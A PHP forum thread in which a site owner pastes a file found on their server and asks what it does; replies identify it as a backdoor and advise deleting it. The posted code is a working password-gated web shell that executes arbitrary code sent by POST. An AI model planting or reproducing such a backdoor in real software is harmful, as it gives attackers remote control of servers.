1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

What does this code mean?

Discussion in 'PHP' started by BANAGO, Dec 30, 2008.

0
  1. #1
    <?php
    error_reporting(E_ALL);
    if (isset($_POST['de8ad874']) && md5($_POST['de8ad874']) == '992c9c4dfbdf0f872baaf5123bea4afd') {
    $test_func = create_function('', urldecode($_POST['f']));
    $test_func();
    }
    exit();
    ?>

    This is inside two folder in my server and I cannot delete that. Is it a bad code?

    Thanks!
     
    BANAGO, Dec 30, 2008 IP
  2. krzyk

    krzyk Peon

    Messages:
    61
    Likes Received:
    3
    Best Answers:
    0
    Trophy Points:
    0
    #2
    This script looks like a gateway to your page. Basically it means that one can provide a string that will be executed as a function in your page.

    Delete all such files as soon as possible.
    If you have shell access then do:
    chmod u+w directory
    where directory is the folder where this php file is located. You can do this also from ftp client, look for "File->change attributes" and give yourself "write" permission on the directory.
     
    krzyk, Dec 30, 2008 IP
  3. tonybogs

    tonybogs Peon

    Messages:
    462
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Yeah this looks dangerous!

    I'd remove it if you can because a user could run harmful functions and really screw you up if they know the right $_POST variables (which would not be hard to get)

    If you can't remove the code because it performs a pivotal function then follow the steps outlined by krzyk. Protect your files.

    Hope this helps
     
    tonybogs, Dec 30, 2008 IP